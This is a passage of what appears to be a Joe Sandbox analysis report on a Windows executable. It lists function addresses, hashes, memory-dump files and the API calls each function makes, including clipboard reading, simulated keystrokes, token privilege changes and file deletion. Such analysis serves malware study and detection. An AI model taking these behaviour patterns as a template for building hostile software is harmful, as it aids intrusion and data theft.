                                                                                                                                  • Instruction ID: 22f41134c0836afffb51d666ef776276249a17644cd520299bd5b64d93b82c0d
                                                                                                                                  • Opcode Fuzzy Hash: a702202ac1931c470af972924dad817cc0d936b03bea9a3a7fdbcbec801ec150
                                                                                                                                  • Instruction Fuzzy Hash: 0BD0C97464020CBFEB10CB90DC46F9A7BBCEB04758F200194F600A62D0D2F2BE419B55
                                                                                                                                  Function 00F14DDC Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClearVariant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                  • Opcode ID: b546216af904dde427f94248f7df760e185e923645643231f33cdd0eafad53fa
                                                                                                                                  • Instruction ID: 063f22ccae25c576cd77ddd758893464357aa28d720e61118a3b669588bf9d3a
                                                                                                                                  • Opcode Fuzzy Hash: b546216af904dde427f94248f7df760e185e923645643231f33cdd0eafad53fa
                                                                                                                                  • Instruction Fuzzy Hash: A0D0C9B1500200DBE730AF69E804B8AB7E4AF40304F24982DE6D692195D776A9D29B12
                                                                                                                                  Function 00EC4129 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __wfsopen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 197181222-0
                                                                                                                                  • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                  • Instruction ID: 5e5f653b1faeaee2ca92959237748d52578041011c1f0b4653a7aa7c0fa1dd54
                                                                                                                                  • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                  • Instruction Fuzzy Hash: 5CB092B244130C77CE012A82EC02F493B599B50660F048020FB0C282A1A673AAA19A89
                                                                                                                                  Function 00EA50EC Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00EA50BE,?,00EA5088,?,00EABE3D,00F622E8,?,00000000,?,00EA3E2E,?,00000000,?), ref: 00EA510C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                  • Opcode ID: 0d5ade63d12688d1152e9f6e246f1afa85df62cec041ff4dc9edf4f935613a63
                                                                                                                                  • Instruction ID: 4f652cb3a79e2dc17ffbe7ecf248f305525b7800443c02981c33e2bebcb2f7e0
                                                                                                                                  • Opcode Fuzzy Hash: 0d5ade63d12688d1152e9f6e246f1afa85df62cec041ff4dc9edf4f935613a63
                                                                                                                                  • Instruction Fuzzy Hash: 3DE0B676400B02CFC2314F1AE844453FBF5FFE63653218A2FD0E596660D7B0648ADB90

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 00F0F5D0 Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 630windowkeyboardnativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00EBAF8E
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 00F0F64E
                                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F0F6AD
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00F0F6EA
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F0F711
                                                                                                                                  • SendMessageW.USER32 ref: 00F0F737
                                                                                                                                  • _wcsncpy.LIBCMT ref: 00F0F7A3
                                                                                                                                  • GetKeyState.USER32(00000011), ref: 00F0F7C4
                                                                                                                                  • GetKeyState.USER32(00000009), ref: 00F0F7D1
                                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F0F7E7
                                                                                                                                  • GetKeyState.USER32(00000010), ref: 00F0F7F1
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F0F820
                                                                                                                                  • SendMessageW.USER32 ref: 00F0F843
                                                                                                                                  • SendMessageW.USER32(?,00001030,?,00F0DE69), ref: 00F0F940
                                                                                                                                  • SetCapture.USER32(?), ref: 00F0F970
                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00F0F9D4
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00F0F9FA
                                                                                                                                  • ReleaseCapture.USER32 ref: 00F0FA05
                                                                                                                                  • GetCursorPos.USER32(?), ref: 00F0FA3A
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00F0FA47
                                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F0FAA9
                                                                                                                                  • SendMessageW.USER32 ref: 00F0FAD3
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F0FB12
                                                                                                                                  • SendMessageW.USER32 ref: 00F0FB3D
                                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F0FB55
                                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F0FB60
                                                                                                                                  • GetCursorPos.USER32(?), ref: 00F0FB81
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00F0FB8E
                                                                                                                                  • GetParent.USER32(?), ref: 00F0FBAA
                                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F0FC10
                                                                                                                                  • SendMessageW.USER32 ref: 00F0FC40
                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00F0FC96
                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F0FCC2
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F0FCEA
                                                                                                                                  • SendMessageW.USER32 ref: 00F0FD0D
                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00F0FD57
                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F0FD87
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00F0FE1C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                                                                                                  • String ID: @GUI_DRAGID$F
                                                                                                                                  • API String ID: 3461372671-4164748364
                                                                                                                                  • Opcode ID: 06174ac3ef4ff23e32eeeec922c7ea75c494db69e79b3404a48e794ec8ce8f4e
                                                                                                                                  • Instruction ID: d030cbe7c25341837763d23f1cf09f34858ba82dae0471ce3b674907b733b1ae
                                                                                                                                  • Opcode Fuzzy Hash: 06174ac3ef4ff23e32eeeec922c7ea75c494db69e79b3404a48e794ec8ce8f4e
                                                                                                                                  • Instruction Fuzzy Hash: 3932BD71604205AFDB20DF64C884AAABBE9FF48324F180529F656876F1C771EC49FB51
                                                                                                                                  Function 00F0A8DC Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00F0AFDB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID: %d/%02d/%02d
                                                                                                                                  • API String ID: 3850602802-328681919
                                                                                                                                  • Opcode ID: 7430eccd9ffa3291fb1b4fabdc0c356fa840fc84bb6477a3e03f647823c6bf64
                                                                                                                                  • Instruction ID: 594ccc5eaf4eb84a95eac5b0a419301adceb02323197880d958b6c1a04ad5e38
                                                                                                                                  • Opcode Fuzzy Hash: 7430eccd9ffa3291fb1b4fabdc0c356fa840fc84bb6477a3e03f647823c6bf64
                                                                                                                                  • Instruction Fuzzy Hash: 6E12DEB1A00309ABEB258F64CD49FAE7BF9EF85320F144219F515AB2D0DB748942EB51
                                                                                                                                  Function 00EBF78E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetForegroundWindow.USER32(00000000,00000000), ref: 00EBF796
                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F14388
                                                                                                                                  • IsIconic.USER32(000000FF), ref: 00F14391
                                                                                                                                  • ShowWindow.USER32(000000FF,00000009), ref: 00F1439E
                                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 00F143A8
                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F143BE
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00F143C5
                                                                                                                                  • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00F143D1
                                                                                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00F143E2
                                                                                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00F143EA
                                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 00F143F2
                                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 00F143F5
                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F1440A
                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00F14415
                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F1441F
                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00F14424
                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F1442D
                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00F14432
                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F1443C
                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00F14441
                                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 00F14444
                                                                                                                                  • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00F1446B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                  • API String ID: 4125248594-2988720461
                                                                                                                                  • Opcode ID: 3ea94a84ed06ee9f4101a0ef0604357cc2193d763b497d6973f144c612c871c2
                                                                                                                                  • Instruction ID: 240b95368f40b86d377b8196e683c3b4341a31253275e260e8fd299a813f0eaf
                                                                                                                                  • Opcode Fuzzy Hash: 3ea94a84ed06ee9f4101a0ef0604357cc2193d763b497d6973f144c612c871c2
                                                                                                                                  • Instruction Fuzzy Hash: D2315471A4021CBBEB315B719C4AFBF7E6CEB84B50F114025FA05EA1D1C6B06D42BEA1
                                                                                                                                  Function 00EE6B3F Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 164filestringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00EA31DA
                                                                                                                                    • Part of subcall function 00EE7B9F: __wsplitpath.LIBCMT ref: 00EE7BBC
                                                                                                                                    • Part of subcall function 00EE7B9F: __wsplitpath.LIBCMT ref: 00EE7BCF
                                                                                                                                    • Part of subcall function 00EE7C0C: GetFileAttributesW.KERNEL32(?,00EE6A7B), ref: 00EE7C0D
                                                                                                                                  • _wcscat.LIBCMT ref: 00EE6B9D
                                                                                                                                  • _wcscat.LIBCMT ref: 00EE6BBB
                                                                                                                                  • __wsplitpath.LIBCMT ref: 00EE6BE2
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00EE6BF8
                                                                                                                                  • _wcscpy.LIBCMT ref: 00EE6C57
                                                                                                                                  • _wcscat.LIBCMT ref: 00EE6C6A
                                                                                                                                  • _wcscat.LIBCMT ref: 00EE6C7D
                                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00EE6CAB
                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00EE6CBC
                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00EE6CDB
                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00EE6CEA
                                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 00EE6CFF
                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00EE6D10
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EE6D37
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00EE6D53
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00EE6D61
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                                                                                                                  • String ID: \*.*
                                                                                                                                  • API String ID: 1867810238-1173974218
                                                                                                                                  • Opcode ID: 9fe1135cbfe549182484a5bc94a77f3d706ad6a6b899c123ed243e9faef7d4bf
                                                                                                                                  • Instruction ID: dd0ace52a60a56795515f7ed21bbad459edd5ad8c1258c647101184292155c2c
                                                                                                                                  • Opcode Fuzzy Hash: 9fe1135cbfe549182484a5bc94a77f3d706ad6a6b899c123ed243e9faef7d4bf
                                                                                                                                  • Instruction Fuzzy Hash: F7516E7290025CAADF21EBA1CC84EEE77BCAF19344F4455DAE549B3041EB319B89CF61
                                                                                                                                  Function 00EF7099 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • OpenClipboard.USER32(00F3DBF0), ref: 00EF70C3
                                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00EF70D1
                                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 00EF70D9
                                                                                                                                  • CloseClipboard.USER32 ref: 00EF70E5
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00EF7101
                                                                                                                                  • CloseClipboard.USER32 ref: 00EF710B
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00EF7120
                                                                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 00EF712D
                                                                                                                                  • GetClipboardData.USER32(00000001), ref: 00EF7135
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00EF7142
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00EF7176
                                                                                                                                  • CloseClipboard.USER32 ref: 00EF7283
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3222323430-0
                                                                                                                                  • Opcode ID: 27140b21267dbf7a48afbd8f571655b91aff3e266cb63c8b915a8826f235f034
                                                                                                                                  • Instruction ID: d3bbf6c1e7a34b897c5cf93e215897bea592844e27f7c04f5a92ff57c12e4fe5
                                                                                                                                  • Opcode Fuzzy Hash: 27140b21267dbf7a48afbd8f571655b91aff3e266cb63c8b915a8826f235f034
                                                                                                                                  • Instruction Fuzzy Hash: 6E51B471208209ABD310FB60DC95F7E77A8AF88B01F105519F686F61E1DF70E9069B62
                                                                                                                                  Function 00EDB9F1 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 223COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EDBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EDBF0F
                                                                                                                                    • Part of subcall function 00EDBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EDBF3C
                                                                                                                                    • Part of subcall function 00EDBEC3: GetLastError.KERNEL32 ref: 00EDBF49
                                                                                                                                  • _memset.LIBCMT ref: 00EDBA34
                                                                                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00EDBA86
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00EDBA97
                                                                                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00EDBAAE
                                                                                                                                  • GetProcessWindowStation.USER32 ref: 00EDBAC7
                                                                                                                                  • SetProcessWindowStation.USER32(00000000), ref: 00EDBAD1
                                                                                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00EDBAEB
                                                                                                                                    • Part of subcall function 00EDB8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EDB9EC), ref: 00EDB8C5
                                                                                                                                    • Part of subcall function 00EDB8B0: CloseHandle.KERNEL32(?,?,00EDB9EC), ref: 00EDB8D7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                  • String ID: $default$winsta0
                                                                                                                                  • API String ID: 2063423040-1027155976
                                                                                                                                  • Opcode ID: d71e4a6d948892eeb1b5e75b8eb5e12ac9f5871434973c273909082441a4c6c8
                                                                                                                                  • Instruction ID: 4e9ff4eace25aa3542092d13b46a1cb0a4efa52c209a77bcebcb0baaff72283a
                                                                                                                                  • Opcode Fuzzy Hash: d71e4a6d948892eeb1b5e75b8eb5e12ac9f5871434973c273909082441a4c6c8
                                                                                                                                  • Instruction Fuzzy Hash: 9781587191020CEFDF119FA4CD45AEEBBB9FF08308F15551AF914B6261EB358E16AB20
                                                                                                                                  Function 00EF2044 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00EF2065
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EF207A
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EF2091
                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00EF20A3
                                                                                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00EF20BD
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00EF20D5
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00EF20E0
                                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00EF20FC
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EF2123
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EF213A
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00EF214C
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00F53A68), ref: 00EF216A
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EF2174
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00EF2181
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00EF2191
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
